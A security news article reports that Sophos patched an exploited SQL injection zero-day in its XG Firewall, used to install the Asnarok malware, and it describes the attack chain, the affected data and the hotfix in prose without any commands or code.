Malware Delivered to Sophos Firewalls via Zero-Day Vulnerability

Cybersecurity company Sophos informed customers over the weekend that it has patched a zero-day vulnerability that has been exploited to deliver malware to its XG Firewall appliances.

Sophos said it learned about attacks targeting its XG firewall on April 22 after a suspicious field value was discovered in a device’s management interface. An investigation revealed that attackers have been exploiting a previously unknown SQL injection vulnerability to hack exposed physical and virtual firewalls. Multiple customers were targeted.

According to the company, the attack was aimed at systems with the administration service or the user portal exposed to the internet. The attackers were apparently trying to exploit the security hole to download malware that would allow them to exfiltrate data from the firewall.

This data can include usernames and password hashes for the local device administrators, portal admins, and user accounts set up for remote access. The malware could have also gained access to information about the firewall, email addresses of accounts stored on the appliance, and information on IP address allocation permissions.

“Passwords associated with external authentication systems such as AD or LDAP are unaffected,” Sophos told customers.

Sophos started taking measures shortly after the attack started and it rolled out a SFOS hotfix that patches the SQL injection vulnerability on April 25. Once they have applied the hotfix, users are also informed if their firewall has been compromised as part of this attack.

In a blog post published late on Sunday, Sophos revealed that the attacker exploited the SQL injection vulnerability to insert a one-line command into the firewall database. This command caused affected devices to download a Linux shell script named Install.sh from a remote server. The script then executed more SQL commands and dropped more files onto the virtual file system.

Other scripts deployed in the attack were designed to ensure persistence across device reboots and for creating a backup channel.

“The Install.sh script, initially, ran a number of Postgres SQL commands to modify or zero out the values of certain tables in the database, one of which normally displays the administrative IP address of the device itself,” Sophos researchers explained. “It appears that this was an attempt to conceal the attack, but it backfired: On some appliances, the shell script’s activity resulted in the attacker’s own injected SQL command line being displayed on the user interface of the firewall’s administrative panel. In place of what should have been an address, it showed a line of shell commands.”

Sophos has dubbed the malware involved in the attack Asnarok and attributed the operation to an “unknown adversary.”

“There was significant orchestration involved in the execution of the attack, using a chain of Linux shell scripts that eventually downloaded ELF binary executable malware compiled for a firewall operating system,” the company explained.

In the initial version of its advisory, Sophos said it had no evidence that the hackers accessed anything on the local networks behind the targeted firewalls, but that sentence was later removed without additional clarifications. The subsequent blog post does say that there is no evidence that the data collected from firewalls was actually exfiltrated.

The cybersecurity firm has published indicators of compromise (IoC) and technical details about the attack. The company says customers whose firewalls have not been compromised do not need to take any action. Users who are informed that their firewalls have been targeted in this attack will need to change their passwords on the device.

Related: Critical Flaw in Sophos Cyberoam Appliances Allows Remote Code Execution

Related: Sophos Patches Privilege Escalation Flaws in SafeGuard Products